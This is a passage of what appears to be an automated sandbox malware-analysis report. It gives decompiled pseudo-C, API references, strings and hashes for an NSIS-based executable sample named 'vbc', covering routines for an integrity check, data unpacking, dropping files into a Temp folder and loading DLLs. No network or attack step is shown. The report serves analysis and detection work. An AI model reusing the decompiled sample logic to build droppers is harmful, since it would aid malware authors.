							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
soft, xrefs: 0040316B
Error launching installer, xrefs: 004030CD
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
Null, xrefs: 00403174
Inst, xrefs: 00403162
}8@, xrefs: 00403227, 00403242

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-3947366757
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
MulDiv.KERNEL32 ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

A, xrefs: 0040347E
... %d%%, xrefs: 004033FB
A, xrefs: 00403374
ZB, xrefs: 004033A2, 004033BD, 0040343A
*B, xrefs: 004032DF
}8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ ZB$ A$ A$... %d%%$}8@
API String ID: 551687249-3683892814
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp");
						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp\nsv7B0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user\AppData\Local\Temp\nsv7B0.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp$C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll$Call
API String ID: 1941528284-1077295158
Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055a5
0x004055af
0x004055b4
0x004055ba
0x004055c5
0x004055c8
0x004055cb
0x004055d1
0x004055d1
0x004055d7
0x004055df
0x004055e2
0x004055ff
0x00405603
0x0040560c
0x0040560c
0x00405616
0x0040561f
0x0040562b
0x00405632
0x00405636
0x00405639
0x0040564c
0x0040565a
0x0040565a
0x0040565e
0x00405660
0x00405663
0x00000000
0x00405663
0x004055e4
0x004055ec
0x004055f4
0x004055fa
0x00000000
0x004055fa
0x004055f4
0x004055e2
0x0040566f

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32 ref: 004055FA
SetWindowTextW.USER32 ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32 ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll,00000000), ref: 00406779

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll, xrefs: 004055C0, 004055D0, 004055D6, 004055F9, 00405605

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv7B0.tmp\System.dll
API String ID: 1495540970-1918373574
Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
%s%S.dll, xrefs: 004068E6
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
